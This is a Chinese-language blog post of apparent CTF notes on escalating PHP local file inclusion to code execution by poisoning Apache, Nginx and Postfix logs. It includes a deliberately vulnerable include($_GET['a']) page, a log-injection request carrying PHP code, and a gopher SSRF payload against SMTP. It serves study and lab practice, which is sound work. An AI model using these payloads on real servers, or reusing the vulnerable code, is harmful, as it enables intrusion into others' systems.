0%

LFI2RCE

Posted on Edited on In

前言

有些文件包含题目需要getshell,在这里总结一下,以后知道更多会补充

apache 日志污染

需要能读到apache日志

apache2

虽然报400错误,但是会写入access.log

image.png

包含getshell

要用burp,postman不然会被urlencode

nginx 日志污染getshell

参考链接:

https://www.ifobnn.com/lfiwithnginxlog.html

http://yulige.top/?p=346

### 环境搭建

index.php

1
2
3
4
<?php
include($_GET['a']);
?>
<!--include($_GET['a']);-->

ubuntu16.04 需要把/var/log/nginx 目录权限设为645

error.log 设为至少644

写入

用burp发包,浏览器会被编码,nginx 不会对get键编码

成功写入

nginx-include2.png

日志文件内容为

1
2
3
4
root@9056889a4768:/var/log/nginx# cat error.log 
2019/11/07 07:32:07 [error] 9486#9486: *4 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: a in /var/www/html/index.php on line 2
PHP message: PHP Warning:  include(): Filename cannot be empty in /var/www/html/index.php on line 2
PHP message: PHP Warning:  include(): Failed opening '' for inclusion (include_path='.:/usr/share/php') in /var/www/html/index.php on line 2" while reading response header from upstream, client: 112.96.102.200, server: _, request: "GET /?<?php phpinfo();?> HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.0-fpm.sock:", host: "39.108.36.103:7777"

自己测试时,想清理日志可以

1
2
3
root@9056889a4768:/var/log/nginx# rm error.log 
root@9056889a4768:/var/log/nginx# touch error.log
root@9056889a4768:/var/log/nginx# service nginx restart

修改日志后,不重启日志会写不进去

SMTP 日志投毒getshell(需要配合ssrf)

出自2019年6月安恒杯的一题

本地ubuntu18.04打不成,不知道为啥

出题人镜像:

registry.cn-hangzhou.aliyuncs.com/bypass/postfix

失效的话用:tinmin/gophersmtp

1
docker pull registry.cn-hangzhou.aliyuncs.com/bypass/postfix

Gopherus构造payload

image.png

payload

1
gopher://127.0.0.1:25/_MAIL%20FROM:%3Ctinmin%40tinmin.cn%3E%0ARCPT%20To:%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%0ADATA%0AFrom:%3Ctinmin%40tinmin.cn%3E%0ASubject:test%0AMessage:test%0A.

发送>>>>>

curl

成功!

success

日志被污染成

root@853c144383cb:/var/www/html# cat /var/log/mail.log
Nov 7 12:16:40 853c144383cb postfix/smtpd[127]: connect from localhost[127.0.0.1]
Nov 7 12:16:40 853c144383cb postfix/smtpd[127]: improper command pipelining after MAIL from localhost[127.0.0.1]: RCPT To:\nDATA\nFrom:tinmin@tinmin.cn\nSubject:test\nMessage:test\n.\r\n
Nov 7 12:16:40 853c144383cb postfix/smtpd[127]: warning: Illegal address syntax from localhost[127.0.0.1] in RCPT command:
Nov 7 12:16:40 853c144383cb postfix/smtpd[127]: warning: non-SMTP command from localhost[127.0.0.1]: From:tinmin@tinmin.cn
Nov 7 12:16:40 853c144383cb postfix/smtpd[127]: disconnect from localhost[127.0.0.1]